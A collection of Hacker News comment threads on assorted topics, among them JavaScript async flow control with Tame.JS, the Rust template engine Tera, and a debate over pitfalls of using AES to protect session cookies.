the market for the past ten years...you have 35 minutes...
~~~
dx034
That's easy and doesn't take 35 minutes. Here's the algorithm:
If year < 2009: short stocks
else: buy stocks
Add some leverage to this and you made a lot of money. Doesn't mean it'll work
in the future, though.
------
nether
One of Quantopian's studies shows that backtesting poorly predicts live
trading results: [https://blog.quantopian.com/using-machine-learning-to-
predic...](https://blog.quantopian.com/using-machine-learning-to-predict-out-
of-sample-performance-of-trading-algorithms/). From the forums, it looks like
90% of the effort is devoted to getting a good backtest, a yardstick which
might not have any bearing on reality. How do real quant traders deal with
this discrepancy?
~~~
akrymski
Real firms use tick data to backtest, not the 1 minute bars that Quantopian
uses, and spend a lot of time simulating network characteristics such as data
and order latency. They also use machine learning, which isn't possible on
Quantopian, to build models, which requires downloading lots of data (and not
just equities). No serious quant will ever use such a tool. You might as well
go to the casino.
~~~
akrymski
Edit: tick data is usually collected over time, because data sources have
different characteristics, and you should be testing over the same realtime
data that you'll be using to trade live. You need to know the bid/ask prices
and volumes, in order to know where to place limit orders. Otherwise you are
just paying commissions and spreads to brokers and market makers.
| {
"pile_set_name": "HackerNews"
} |
WikiLeaks Turned Down Leaks on Russian Government During US Pres. Campaign - putsteadywere
http://foreignpolicy.com/2017/08/17/wikileaks-turned-down-leaks-on-russian-government-during-u-s-presidential-campaign/
======
putsteadywere
"in 2010, Assange vowed to publish documents on any institution that resisted
oversight... “We don’t have targets,” Assange said at the time."
But by 2016, WikiLeaks had switched course, focusing almost exclusively on
Clinton and her campaign.
Approached later that year by the same source about data from an American
security company, WikiLeaks again turned down the leak. “Is there an election
angle? We’re not doing anything until after the election unless its [sic] fast
or election related,” WikiLeaks wrote. “We don’t have the resources.”
Anything not connected to the election would be “diversionary,” WikiLeaks
wrote.
| {
"pile_set_name": "HackerNews"
} |
Premature Optimization and the Birth of Nginx Module Development - mattyb
http://evanmiller.org/premature-optimization-and-nginx-module-development.html
======
Smerity
I always wondered why an Nginx module that was about generating a circle had
such prominence on the Nginx website and now I can say I understand =]
Although this was premature optimization I still find it a beautiful hack. The
author was still not content with the C solution of actually generating the
GIF each time (which took 30ms, actually a long time for servers) and instead
reframed the problem at a deeper level and created a beautiful little hack
that just modified the palette table.
~~~
jarin
If you like that, you should look into old-school color cycling/palette
shifting techniques used in the 8-bit era.
Someone did it with HTML5 too:
[http://www.effectgames.com/effect/article.psp.html/joe/Old_S...](http://www.effectgames.com/effect/article.psp.html/joe/Old_School_Color_Cycling_with_HTML5)
Demo:
<http://www.effectgames.com/demos/canvascycle/?sound=0>
~~~
StavrosK
I've seen that before, but I'm still amazed at how beautiful it is. I can't
fathom how simple palette cycling can produce these effects, even when I'm
looking at the palette.
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Did Steve Jobs have any technical skills? - angrisha
This question has been haunting me for quite some time. Was steve Jobs just the marketing guy? Or was he involved in hardware/software development of the apple devices too?<p>Thank you.
======
wh-uws
For some reason more recently this old wive's tale of Steve not being
technical has catching on.
Read this story here about a 12 year old steve.
[http://blog.eladgil.com/2011/09/12-year-old-steve-jobs-
meets...](http://blog.eladgil.com/2011/09/12-year-old-steve-jobs-meets-
bill.html)
And decide if you would still like to believe he's not technical.
------
Hitchhiker
To work with someone like Woz in the early days implies that Steve would hold
his own at least to herd a bunch of highly skilled folks forward.
Vision is not just about skills. It is something far deeper and not entirely
rational or a result of 10,000 hours of training.
[http://forums.appleinsider.com/archive/index.php/t-19686.htm...](http://forums.appleinsider.com/archive/index.php/t-19686.html)
seems to have a good discussion on the subject.
------
willvarfar
Where did he meet Woz? A marketing convention?
~~~
profitbaron
Steve Wozniak became friends with Steve Jobs, when Jobs worked for the summer
at a company where Wozniak was working on a mainframe computer.
~~~
coryl
Possibly HP?
------
glimcat
He was a tech for Atari at one point.
| {
"pile_set_name": "HackerNews"
} |
Gene-Edited Babies: What a Chinese Scientist Told an American Mentor - pseudolus
https://www.nytimes.com/2019/04/14/health/gene-editing-babies.html
======
nkingsy
So much of science seems to be run on handshakes (peer review, IRB in this
article), and from the outside it looks like they’re experiencing problems
scaling.
There is a joke about science police in there, but it seems like a lot depends
on the ethics of individual scientists and the institutions that support them.
| {
"pile_set_name": "HackerNews"
} |
Tame.JS: Flow-control by the makers of OkCupid.com - petar
http://tamejs.org/
======
aston
I've been waiting for this sort of thing for the longest. The first time I saw
the callback passed to a callback of a callback's callback style in Node.js, I
wondered why the code couldn't look as nice as the async C++ I'd written at
OkCupid. From my lips to Max & Chris's minds... (telepathy!)
How long 'till the port to CoffeeScript syntax?
~~~
malgorithms
It's funny, when Max started programming Tame.Js a couple weeks ago, I
exchanged emails with a developer who tried to make something similar for
CoffeeScript who couldn't convince others it was needed. He said the common
response was that if you need something like Tame for async you're not "doing
it right." (Obviously we disagree.)
~~~
jashkenas
I'd be more than happy to explore the addition of Tame.js-style CPS to the
CoffeeScript compiler -- but there's a lot of prior work there already:
<https://github.com/jashkenas/coffee-script/issues/241>
<https://github.com/jashkenas/coffee-script/issues/287>
<https://github.com/jashkenas/coffee-script/issues/350>
_Edit_ :
Things look a little less promising after running a simple test. This input
JavaScript:
while (i--) {
twait {
fs.readFile("one");
fs.readFile("two");
}
}
Gets compiled into this resulting "tamed" JavaScript:
var tame = require('tamejs').runtime;
var __tame_fn_0 = function (__tame_k) {
var __tame_k_implicit = {};
var __tame_fn_1 = function (__tame_k) {
if (i --) {
var __tame_fn_2 = function (__tame_k) {
var __tame_ev = new tame.Event (__tame_k);
var __tame_fn_3 = function (__tame_k) {
fs .readFile ( "one" ) ;
fs .readFile ( "two" ) ;
tame.callChain([__tame_k]);
};
__tame_fn_3(tame.end);
__tame_ev.trigger();
};
tame.callChain([__tame_fn_2, __tame_fn_1, __tame_k]);
} else {
tame.callChain([__tame_k]);
}
};
__tame_k_implicit.k_break = __tame_k;
__tame_k_implicit.k_continue = function() { __tame_fn_1(__tame_k); };
tame.callChain([__tame_fn_1, __tame_k]);
};
__tame_fn_0 (tame.end);
... not so nice to work with or debug. The general conclusion of that series
of tickets was that the code generation required to make this CPS
transformation work with all edge cases is a bit too hairy to be worth it on
balance. Depending on how much sequential async you're doing, YMMV.
~~~
maxtaco
It's on the list of todos to preserve the input line-numbering in the output
code. This would mean some changes to the code emitter, and also to the code
emitted to preserve the ordering of statements.
In tame/C++, debugging either compiler or runtime errors is straight-ahead, as
the developer doesn't need to examine the mangled code. Now if only JavaScript
had the equivalent of cpp's #line directive....
~~~
jashkenas
We're getting there ... maybe this summer.
<https://bugs.webkit.org/show_bug.cgi?id=63940>
<https://bugzilla.mozilla.org/show_bug.cgi?id=618650>
------
statictype
Ever since I first heard of CoffeeScript, I'd been hoping that features like
this would make it into the language. It's not realistic to wait for
javascript interpreters in the browser to catch up, but this would be a
perfect addition for a compiler like CoffeeScript.
------
pmjordan
The problem this solves is a serious one, in my experience, even though I find
their choice of syntax rather curious. Given that JavaScript 1.7 introduces
the _yield_ keyword, it would make sense to add support for that to V8 and
implement the infrastructure for concurrent asynchronous I/O around that as a
library. The concurrency aspect is, after all, orthogonal to the blocking vs.
callback situation, and can easily be done even when using callbacks, with a
single callback function called upon completion of all concurrent I/O. I
believe the Dojo framework provides such a utility, and I wrote my own
simplistic stand-alone mini-library for exactly this a while back. [0]
I've run into the problem of endless chained callbacks in C, where it's much
worse due to the lack of nested functions, let alone closures or garbage
collection.[1] I ended up using the switch block "coroutine" hack [2] for the
worst cases, along with dynamically allocated "context" structs to hold
"local" variables. A proper macro system would have helped transform blocking
code into CPS form. I tried to integrate a SC [3] pass into our build, which
could have done it, but ran into all sorts of practical/yak shaving problems,
so I ended up with the C preprocessor macro/switch solution for now. In user
space, explicit stack-switching with something like _swapcontext()_ is
probably preferable, if you can get away with it, but in the kernel this is
rather problematic.
[0] <https://github.com/pmj/MultiAsync-js>
The reason I wrote my own was because I originally needed it in Rhino, the
JVM-based JS implementation, and I couldn't find anything similar that worked
there.
[1] Yes, there are garbage collectors that work with C, but to my knowledge,
none of them can be used in kernel modules. In any case, the other 2 issues
are worse and aren't solveable within the language via libraries.
[2] <http://www.linuxhowtos.org/C_C++/coroutines.htm>
[3]
[http://super.para.media.kyoto-u.ac.jp/~tasuku/sc/index-e.htm...](http://super.para.media.kyoto-u.ac.jp/~tasuku/sc/index-e.html)
~~~
maxtaco
My first thought for implementing tame.js was with yield, but V8 doesn't
currently support it (though it's reserved as a "future" keyword). A direct
use of yield (without anything like twait) would probably make node code look
more like Python/Twisted code, which while better than the status quo, still
can get unmanageable in my experience.
Agreed that twait conflates concurrency with blocking/callbacks, but it my
experience, it's a natural and useful combination.
~~~
bdarnell
I think you could do something manageable with yield alone (at least with
python-style generators). I've been meaning to try something like this with
tornado. The general idea is that yielding would either immediately produce a
callback or asynchronously "wait" for a previously-generated callback to be
run. It would look something like this:
doOneThing(yield Callback("key1"))
andAnother(yield Callback("key2"))
res1 = yield Wait("key1")
res2 = yield Wait("key2")
------
snprbob86
Looks a lot like C# 5's await/async keywords:
<http://blogs.msdn.com/b/ericlippert/archive/tags/async/>
Cool to see growing interest for this at the language level.
~~~
contextfree
It looks even more like F# async workflows, which compared to the C# async
feature have the advantage of being implemented in the current shipping
version rather than the next one.
------
reustle
I've been very happy with "parallel" in the async library by caolan
<https://github.com/caolan/async>
------
sjs
Why hasn't anyone brought up error handling yet? What happens when an error is
thrown inside a twait block? What happens when 2 errors are thrown inside a
twait block?
Tame.js looks nice in that it's very simple to learn but ~300 lines of plain
old JavaScript[1] can give you a general purpose deferred/promise library with
more flexibility should you need to do something other than wait on N async
operations and then use the results.
[1] [https://github.com/heavylifters/deferred-
js/blob/master/lib/...](https://github.com/heavylifters/deferred-
js/blob/master/lib/deferred.js)
------
geuis
In what significant ways is this different from deferreds/promises/futures?
~~~
voidfiles
I was wondering the same thing. If the spec evolves tools to handle this
stuff, thats one thing, and of course this could be an example solution, but
right now I think the problem has a solution without adding extra keywords to
the language.
~~~
bialecki
I would've thought the same thing until I wrote substantial async code in JS
and Python.
It's not that it doesn't work and you can't do it, it's that the code becomes
a mess and their example gets at that. It probably doesn't seem like a big
deal, but when you constantly have to pass around callbacks and chain requests
together you get this feeling the code could look a lot cleaner than it is.
You want asynchronous behavior but with synchronous syntax.
This isn't possible without adding _something_ , and, having seen a lot of the
solutions out there, it's nice to see someone take a stab at it by changing
the language. The cost is huge (preprocessing, etc.), but, speaking from
experience, the simplicity of the code you write might make the change worth
it. You get the feeling in 5-10 years this will be a solved problem, but I'm
not sure any of the solutions out there yet will be the accepted solution.
------
Pewpewarrows
This seems neat, but after reading through it twice I can't seem to understand
how this provides any advantage over just using Deferreds. Someone care to
enlighten me?
------
va1en0k
That reminds me of monads in Haskell (they can solve this problem (and other
as well) matemagically). I've seen somewhere a proposal to add them into
Javascript, but I doubt the idea will be loved by public.
(By "add them to JS" I mean some syntactic sugar, not a library)
~~~
pmjordan
Proposal? JavaScript 1.7 introduced generators circa 2006, which I do believe
lets you implement something like this (in addition to a bunch of other cool
things).
[https://developer.mozilla.org/en/New_in_JavaScript_1.7#Gener...](https://developer.mozilla.org/en/New_in_JavaScript_1.7#Generators)
Unfortunately, V8 doesn't support generators, as far as I can tell.
~~~
va1en0k
sorry? generators? well, I like generators, but what's your point?
~~~
pmjordan
yield;
Will block execution until the generator is resumed and return control flow to
the caller. I haven't actually tried it, but it should be pretty
straightforward to wrap a generator function in such a way that it's driven
(resumed) by callbacks from async I/O calls.
------
janetjackson
This is the wrong solution to the problem, and it's implemented poorly.
Use a proper control-flow ( not "flow-control" ) library like
<https://github.com/caolan/async>.
Furthermore, why would you write an entire custom js parser for this? Why not
use some of the many many pre-existing ones that are much more stable, more
developed, and well supported.
~~~
__david__
Seriously? The library solution is pretty ugly--though it's a good solution if
you are absolutely dead set against compiling your "javscript". Tame, being a
code transformer, makes the equivalent code _so_ much more readable and clean
looking.
How on earth is readable, clean looking code "the wrong solution to the
problem"? I would argue that it's almost always the _right_ solution to a
problem.
------
frankdenbow
Slightly Unrelated: There was a site recently on hn that was a listing of
various js libraries, like this one, on one page. What was it?
~~~
matthiaswh
There are two that fit your description and are really useful:
<http://www.everyjs.com/>
<http://microjs.com/>
~~~
frankdenbow
thanks! microjs was what i was thinking of
------
yaix
This is nice on the browser, but not very useful in nodeJS.
twait{} will block and stop my nodeJS process from doing anything else.
It would be more useful if I could give twait{} a callback to fire when all
its async events completed. Then my nodeJS process could do other stuff while
waiting for a twait{} bundle to finish.
~~~
malgorithms
No, that's not the case. twait won't block your Node process from handling
other events.
~~~
yaix
Isn't it waiting to execute anything that follows after a twait code block?
If so, then it is blocking. Otherwise, how do you manage to let other code be
executed, except the code you don't want to be executed until all functions in
the twait block have returned?
The would need to be a callback attached to the twait block, but there isn't.
So it's blocking.
Because that is it's purpose, to block further executing until all data from
the non-blocking functions have returned.
~~~
baudehlo
From looking at it, each twait block is blocking as a unit, but other code
elsewhere from the twait block will still run.
------
teyc
Also see JSCEX, which uses the C# keyword await
[http://groups.google.com/group/nodejs/browse_thread/thread/3...](http://groups.google.com/group/nodejs/browse_thread/thread/337f83c028f371c2)
------
lzm
The next version of Visual Studio will have something similar:
<http://msdn.microsoft.com/en-us/vstudio/async.aspx>
------
trungonnews
So the code we write is clean and easy to understand, but the debugger only
work with the compiled version of the code?
In another word, write in C, and debug in assembly...
------
starwed
There's a bug in huntMen. _if (! is_vamp)_ should instead be _if (
is_vamp)_... :P
------
tjholowaychuk
why not just use node-fibers?
~~~
maxtaco
A key advantage of fibers of course is that they preserve exception semantics,
whereas tame can't in all cases. I'm not too interested in reviving the
stalemated thread v. event religious war. I prefer explicitly-managed events,
but if others prefer a more thread-like API, by all means....
~~~
jrockway
In the end, both are the same thing; managing action-specific state in an
application-defined per-action data structure. With OS threads, you let the OS
manage the state instead. This can be inefficient with a large number of
actions, because most of the state kept has nothing to do with the application
itself; it's OS bookkeeping overhead.
------
diamondhead
For those who looking for the JavaScript way of the examples;
<https://gist.github.com/1090228>
| {
"pile_set_name": "HackerNews"
} |
Introducing Tera, a template engine in Rust - adamnemecek
https://blog.wearewizards.io/introducing-tera-a-template-engine-in-rust
======
the_mitsuhiko
As someone who spent way too much time building Django inspired template
engines (Jinja, Jinja2, Twig, etc.) I must say this is really cool and very
close to what I wanted to build myself for Rust but did not have the time.
> Tera uses serde which means that in the example above
Very good. But serde needs to get stable :(
> beautiful html output out of the box (ie no need for the {{- tags)
This is a request that comes up often but I tested this so much and always
came back to not doing magic. It breaks too many applications in unintended
ways (particularly plain text output).
> able to register new tags easily like the {% url ... %} in Django
I would not do that again. Jinja has an extension interface and I regret
adding it. I much rather have people just expose functions to the templates.
That said, in Rust that might be not a good idea because there are no keyword
arguments so make it makes sense there.
> no macros or other complex logic in the template […] include partial
> templates
Another thing i strongly disagree with but I can see the motivation. Macros in
Jinja I prefer so much over includes because it becomes clear what values
exist. Includes become really messy unless you are very organized. Macros
(which are just functions) accept the parameters and it becomes clear what the
thing does. Just look at that macro as an example:
[https://github.com/pallets/website/blob/master/templates/mac...](https://github.com/pallets/website/blob/master/templates/macros/navigation.html)
It's absolutely clear what it accepts as parameters. If that was a partial
include the "caller" needs to set up the variables appropriately and there is
no clear documentation on what the template wants etc.
But awesome to see this happen for Rust!
~~~
Keats
> Very good. But serde needs to get stable :(
I agree :(
> This is a request that comes up often but I tested this so much and always
> came back to not doing magic. It breaks too many applications in unintended
> ways (particularly plain text output).
That was even the first feature request I got. I don't think I'll go more into
magic than what it currently is, seems to be okay-ish
> I would not do that again. Jinja has an extension interface and I regret
> adding it. I much rather have people just expose functions to the templates.
> That said, in Rust that might be not a good idea because there are no
> keyword arguments so make it makes sense there.
That was my first thought on a better way to do template tags but not sure how
to do that in Rust. If anyone has an idea, there's
[https://github.com/Keats/tera/issues/23](https://github.com/Keats/tera/issues/23)
now
Good point about macros, maybe I can have a look later. Macros and include
feel like they fill the same spot in my mind in terms of features so I'd
rather not have both.
~~~
lomnakkus
> Good point about macros, maybe I can have a look later. Macros and include
> feel like they fill the same spot in my mind in terms of features so I'd
> rather not have both.
You could always repurpose includes as _imports_ , i.e. not generate any
output from imports, but to allow their use as purely an organizational tool
for importing macros.
------
Pxtl
I've been expermenting with Mustache under the hood lately, so I'm interested
in template implementations. It seems odd, you've chosen an odd middle-ground
of "support arithmetic" and "no real heavy logic".
Having played with the subject a few times, I've come to the general feeling
that it's best to choose a hard line on one side or the other - either the
mustache "pure logicless" or just do straight string interpolation (assuming
the language provides a good syntax for multi-line string interpolation - C#
_almost_ does except that you have to escape all your quotes. Dunno if other
languages to better).
Any particular reason why you chose to support _some_ logic instead of none or
all?
~~~
JBReefer
Do you know if the quote escape is still required with C# 6 interpolation?
~~~
Pxtl
C#6 string interpolation is glorious, but if you use the multiline
var myString = $@"
Hey, string interpolation is nifty.
Look ma, no { this.Hands.ToString().ToUpper() }
More text.
But this is a ""quote"". It's ""ugly"" isn't it?
";
As you can see, you need to double your double quotes to escape them. Almost
perfect. You can even nest string interpolations to do next template stuff
with functional-programming loops and whatnot.
~~~
virtualwhys
Scala seems to do what you want:
val str = s"""
Tripe quoted string interpolation
Allows for $variables and ${method.foo(bar)}
Mixed with "quotes"
"""
Can also use double quoted string interpolation for inline/one-liners where
embedded quotes above aren't needed.
~~~
Pxtl
Neat! With facilities like that, Id be tempted to skip templating libraries
altogether and just have a normal interface for templates and use the regular
string expressions... Unless I needed then internationalized, and that's where
Mustache shines, IMHO.
------
acjohnson55
After using many templating systems over the years, I'm sold on the opposite
approach of embedding (a description of) the output language in the host
language, rather than trying to embed logic in the output language. Think
React or Scalatags. Logic becomes trivial, because it's the logic of the host
language. And the output can be the output language, directly, or some other
data structure (VDOM, in the case of React).
It's similar to the concept of the free monad [1].
[1] [http://underscore.io/blog/posts/2015/04/14/free-monads-
are-s...](http://underscore.io/blog/posts/2015/04/14/free-monads-are-
simple.html)
------
nikolay
Clean, meaningful syntax! Great job!
Edit: Why spread the ugliness of "endif" and "endblock"? Why not just "end"?
Why have the unnatural "elif" as well?
~~~
the_mitsuhiko
> Edit: Why spread the ugliness of "endif" and "endblock"? Why not just "end"?
> Why have the unnatural "elif" as well?
Not the developer but I did not remove endif for twig or jinja either coming
from Django. Reasons for it: it becomes a lot more readable in the templates
and it avoids lots of debug headache due to accidentally deleting things. It's
already hard enough to debug template code sometimes but this way at least
it's very quickly clear what the problem is.
What would you use instead of elif? `{% else if %}` is in no way nicer than
`{% elif %}`. I picked `elif` in Jinja because it's what Python uses and
that's where Jinja is at home.
~~~
Keats
I was about to reply exactly that, thanks!
~~~
nikolay
You have to indent anyway. Then "endblock" becomes redundant. Also, you can't
have a blank "{% elif %}" \- it needs to be followed by a condition. I think a
more natural and English-like syntax beats having to memorize deviations.
------
bfrog
Why add the requirement of naming the end tags? Seems like a relatively small
change except if your trying to re-use templates everywhere
~~~
Keats
Just for the sake of readability. At a previous job we had pretty huge
templates and I would forget the name of the block by the time I reached the
end
~~~
nikolay
Give people an option. I prefer "end" \- make "endblock" work like "end", but
check nesting.
| {
"pile_set_name": "HackerNews"
} |
If You're Typing The Letters A-E-S Into Your Code, You're Doing It Wrong - jeffreyg
http://chargen.matasano.com/chargen/2009/7/22/if-youre-typing-the-letters-a-e-s-into-your-code-youre-doing.html
======
cpach
Older HN thread for this article: <http://news.ycombinator.com/item?id=639647>
------
cperciva
I am a proud member of the doing-it-wrong society.
~~~
tptacek
And you deserve every picodollar you earn for doing it that way, Colin.
~~~
cperciva
Hey, it's a _lot_ of picodollars!
~~~
tptacek
Five hundred billion of those will buy you a cup of coffee, won't it? I think
you should call this the Zimbabwe Pricing Plan.
~~~
spicyj
Fifty cents buys a cup of coffee?
------
jqueryin
I would have much preferred if the post wasn't acted out as a narrative as it
detracted from the powerful message of not using AES and why it's flawed.
~~~
JimmyL
My takeaway from the article wasn't "don't use AES" - it was "use a
sufficiently high-level cryptography library such that someone smarter than
you is deciding which algorithm to use and with which options".
~~~
joe_the_user
Yes,
But it seems like the situation they describe is one where you wouldn't want
to use encryption _at all_. Why give the user his data in an encrypted form
when you can give the user an ID and keep his data entirely away from him?
Seriously, when does giving someone data you don't want them to read _ever_
work better than just not giving them data at all?
~~~
NateLawson
I agree. That's why "keep the data on the server" is preferable to "send it to
the user but protect it with custom crypto".
~~~
joe_the_user
Yes,
Having a narrative reinforces the point that what you actually do depends on
the entire context of the application. You would almost never be the one
implementing cannot-be-broken-under-ANY-circumstances encryption. So you have
to know what the circumstances are. In this case, the circumstances point to
no-encryption-whatsoever!
Sure, you could point to other circumstances where something like what they're
talking about _would_ be useful but that's a million possible circumstances
with a million possible encryption solutions and you've lost the useful
urgency of the original concrete narrative.
------
joe_the_user
I love the narrative account. Making a point dramatically is great and a
pseudo-mystery story is great way to talk about encryption.
The narrative is right that AES is a wrong solution.
_But really, any encryption_ at all _is a wrong, bass-ackwards solution to
keeping the user from modifying their account information._
A single cookie or argument that's a randomly generated user id with all the
information server-side is much better.
I mean, consider any scenario where you pass the user data you'll later use.
Will you not keep track of that data yourself but expect that the user's
encrypted cookie will do it for you? This is one way of simulating
statefulness in the stateless http protocol but it's a clearly an inferior,
dumshit of doing it and it doesn't matter what encryption you use for the
purpose. Giving someone encrypted information they can't use is essentially
analogous to copy-protection and similar unwinnable scenarios whereas the
unique id approach is pretty much the standard and works well for many, many
apps of all sorts.
Having unique user-ids and user-information is only costly in terms of
accessing the information. But there isn't a point where decrypting
information coming from the user becomes less costly than getting it from the
database. Indeed, the higher the traffic, the more different brute-force
attacks make sense.
------
bartl
If the idea of the article was to make me feel inadequate, it did a remarkably
good job.
~~~
NateLawson
I don't think that was the goal. This whole crusade is just to get people to
realize the true cost of getting crypto right. It costs time and money to
build a resilient protocol. How many person-hours went into the AES
competition? What was the proportion of time spent on creating the algorithms
versus analyzing them?
In crypto, review costs much more than design. If you understand that tradeoff
and the benefits of your own design are worth spending this effort on,
congratulations, you are Qualcomm, Netscape, or Intel. All of these companies
had staff cryptographers.
More likely, your problem is close enough to other problems that you don't
need to spend the time or money to DIY. If that path is available, take it!
------
jrussbowman
Ok, grant it I'm new here, and could be missing the point. I didn't actually
go through the full article because I'm not really that much into crypto, and
really, didn't the guy fail the interview at the point where he suggest that
encryption was the answer for a cookie used for individual identification? I
mean, encrypt it all you want, if I can be behind the same NAT as you, and
spoof your user agent, all I need to do is get that cookie and put it in my
browser, and I've stolen that session.
The real answer is you need to either encrypt the transport, or at the very
least minimize the amount of time that cookie is valid for.
~~~
mrcharles
The real answer is that you sound like you'd benefit from reading the whole
damn article.
~~~
jrussbowman
Well, I read the entire article, and it's quite interesting that there are
things like Keyczar and cryptlib out there, I still think it's a poor example.
Other than a brief note on encryption does not equal authentication, they
never touched on the fact that encrypting the cookie data itself isn't a real
solution, as the encrypted cookie can be sniffed, and replayed to the server.
So, while standard user can't hack their own cookie for escalation, they can
sniff admin cookies to get that escalation. If the cookie is used for
authentication or authorization, encrypting it's content is providing a false
sense of security, no matter what nifty library you choose or not choose to do
it with.
~~~
zmimon
> as the encrypted cookie can be sniffed, and replayed to the server
I think the whole article is premised on requiring a level of security that
would presume TLS is being used.
~~~
NateLawson
Yes, the focus is on preventing cookie forgery for pre-auth account compromise
or privilege escalation.
------
tibbon
Anyone got a TL;DR version?
Basically encryption isn't authentication?
~~~
sapphirecat
1: Encryption isn't magic pixie dust: people can tamper with the ciphertext
and fool you. Sometimes they can even mess with the padding and decrypt the
entire message.
2: A rule of thumb that falls out of this: never try to decrypt ciphertext
that you can't verify is authentic. Consequence: compute the MAC over the
ciphertext, not the plaintext, so you don't have to decrypt to check the MAC.
I've done my message format in the past as "{version}{hmac-md5}{ciphertext}".
This is suitably secure, to the best of my knowledge. And thanks to the
version, it lets me alter the algorithms or keys without service disruption.
Once all sessions using it would be expired, the old version can be assumed to
be expired.
~~~
NateLawson
If the version is not covered by the HMAC, you may be subject to rollback
attacks. Compare the SSLv2 and v3 protocols to see what was done to address
this.
Really, it's very easy to make a mistake.
~~~
sapphirecat
I'm sorry, I don't get it. For session cookies, the client cannot do any
validation of the cookie, so it's a completely different domain.
Also, unlike session cookies, SSLv2 never had a hard expiration date after
which it could be unconditionally rejected.
However, I did just realize that for perfect security, there must be a service
disruption on change of version. Otherwise you may be upgrading an attacker's
forged v1 cookie to v2, if they submit a request before the v1 expiration.
~~~
NateLawson
Upgrading cookies is a bad idea. Revoking them and requiring reauthentication
is better. See the talk I gave at Google on web crypto where I talk about
exactly that situation.
[http://rdist.root.org/2009/08/06/google-tech-talk-on-
common-...](http://rdist.root.org/2009/08/06/google-tech-talk-on-common-
crypto-flaws/)
Your last paragraph shows you now have better understanding of this.
------
lr
My answer: I'd implement a real SSO solution, like CAS:
<http://www.jasig.org/cas> \-- Open Source, started at Yale, and supported by
an amazing team of people.
------
aschobel
We use the AES cipher for user authentication, we use the Rijndael variant
since we want 192-bit block size.
Our userIds are 64-bit with a 128-bit secret.
We generate the authentication cookie as follows:
Rijandael(64-bit userId + 128-bit secret, 192-bit key) = 192-bits of cipher
text
If you tamper with the cipher text the 128-bit secret won't be the same.
I don't see a practical cipher text tampering attack against this scheme.
There are authorization issues like how do expire a specific user login.
~~~
NateLawson
This is a great example of warning signs. Note the number of times sizes
(bits) and algorithm (AES/Rijndael) are mentioned. Note the lack of clarity in
the specification (is "+" addition, XOR, or concatenation?) Note the overly-
large UID space which has nothing to do with security (will you really have
more than 4 billion users?)
Now look at how useful this design is. You've created a single-purpose
authenticator that just says "someone at some point in time has seen this
exact UID/authenticator pair". All other features (expiration, privileges,
source of the authenticator, version, system name the UID is for) are left
out.
Maybe it's "secure", but it doesn't do anything.
~~~
fasthead
And your post, sire, is a great example of not understanding the intent of
security. There's always a tradeoff between the requirement on the level of
security and cost in implementing it. Security is a matter of tradeoff.
Even with your proposed solution, there are still security breach. How does
your solution handle the situation where someone hijacks the user's machine
and uses his browser session? How does your solution handle the case of
keylogger stealing the user's userid/password and start a valid session?
See there are always ways to make any security solution fall short. The
security is always a balance between a number of competing goals. If the
solution satisfies the requirement, it's a sound solution.
~~~
NateLawson
I don't understand how you get "computers are insecure" from "Arbitrary-
MAC(UID) is not a useful protocol".
------
achille
Why encrypt the cookie at all? Why not just have server1 sign it and haver
server2 verify server1's signature?
~~~
NateLawson
The point of the article is that some people use encryption to try to achieve
authentication, which doesn't work. You're right. Signatures are appropriate
for providing authentication. HMAC is a form of symmetric authentication.
------
hga
Heh; an illustration that the real art here is in cryptographic protocols, not
crypto black boxes like AES (well, as long as your "random" numbers are random
enough, which turns out to be an issue in the VPS world).
I was lucky enough to learn this in 1979 while in a group trying to puzzle out
how to make an authentication system based on public keys (I've read they
didn't get it right until the mid-80s).
Final note: these protocols are _fragile_. If e.g. Microsoft implements
Kerberos but changes one little thing without explanation, let alone a serious
and public security review, _don't trust it_!!!
\- Harold, a proud member if the Do It Right Society.
~~~
cperciva
_an authentication system based on public keys (I've read they didn't get it
right until the mid-80s)._
Make that mid-90s. How to do public key signatures wasn't really settled until
Bellare and Rogaway published PSS at Eurocrypt 96.
~~~
hga
Sorry, I wasn't clear/precise, I meant an "authentication server" type
protocol/system, e.g. like Kerberos.
| {
"pile_set_name": "HackerNews"
} |
The Top 10 Daily Consequences of Having Evolved - closure
http://www.smithsonianmag.com/science-nature/The-Top-Ten-Daily-Consequences-of-Having-Evolved.html?device=android&c=y
======
djacobs
But every so often, our mitochondria and their
surrounding cells fight. The result is diseases,
such as mitochondrial myopathies (a range of muscle
diseases) or Leigh’s disease (which affects the
central nervous system).
It's not clear to me that mitochondria are fighting their host cells in a
myopathy. They simply aren't working because of genetic mutation. Even if we
do say they are "fighting", it's not obvious why that is a result of them
originating from two different cells.
------
Morendil
Bizarrely the article makes no mention at all of the various cognitive
consequences of our evolutionary history, such as confirmation bias, which
certainly have more impact on our lives on a daily basis than do hiccups. (I
get hiccups maybe once a month or so, brainfarts several times a day.)
------
carbocation
What is this linkbait tripe doing in my HackerNews? Flagged.
~~~
theBobMcCormick
What makes it tripe? Seems like interesting bio-trivia to me? And from the
Smithsonian of all places, it's definitely got some authority behind it.
------
exit
the most consequential aspect of being an evolved system is our obsessive
attachment to survival in spite of the tremendous suffering we endure.
------
eru
"Monkeys suffer the same fate only rarely, but then again they can’t sing or
dance. Then again, neither can I."
| {
"pile_set_name": "HackerNews"
} |
Asm.js Chess Battle - fishtoaster
https://dev.windows.com/en-us/microsoft-edge/testdrive/demos/chess/
======
bsimpson
The code they are benchmarking is written in C, then compiled to asm.js
(presumably with Emscripten). In one version, they remove the "use asm"
header, but the code appears identical.
That seems like a strange test. They aren't testing JS against ASM, or even
compiled-to-vanilla-JS vs compiled-to-ASM. Both versions are compiled to ASM
(complete with all strange annotations like num|0), only one has the asm
optimizations disabled. I don't know enough about asm to know if their
annotations are slower than vanilla JS in unoptimized engines, but I suspect
they might be.
I was also surprised that asm still won in Chrome - I thought Chrome optimized
for asm-like code without checking for the "use asm" flag.
~~~
azakai
> I don't know enough about asm to know if their annotations are slower than
> vanilla JS in unoptimized engines, but I suspect they might be.
The opposite is true, for the most part. JS engines, even without asm.js
optimizations, utilize the fact that the | operator emits a 32-bit integer
(per the JS semantics), so it helps their type inference.
(The engine needs to be good enough to get rid of the actual 0 value in the |0
coercions, but JS engines have been that good for several years now anyhow.)
> I was also surprised that asm still won in Chrome - I thought Chrome
> optimized for asm-like code without checking for the "use asm" flag.
Chrome detects "use asm", and enables TurboFan on such code. All JS engines
today detect "use asm", except for JavaScriptCore.
------
mdergosits
> Refresh page to play again
This was very infuriating. The server seemed to be under load and took several
minutes to load. I was not going to wait for it load again to retry the
simulation.
~~~
arasmussen
Seriously. Came here to say this. How hard is it to add a button that says
"play another".
~~~
libria
FWIW, I put this in console so I could click the banner at the end to start
over:
